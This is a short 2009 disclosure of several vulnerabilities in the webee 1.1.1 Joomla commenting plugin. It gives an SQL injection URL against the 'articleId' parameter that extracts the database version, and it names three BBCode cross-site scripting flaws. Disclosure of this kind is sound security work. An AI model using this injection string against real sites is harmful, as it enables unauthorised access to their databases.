webee 1.1.1 Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 
  2. [img] BBCode [color] Tag XSS

  3. [url] BBCode [img] Tag XSS

  4. [size] BBCode [url] Tag XSS


UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2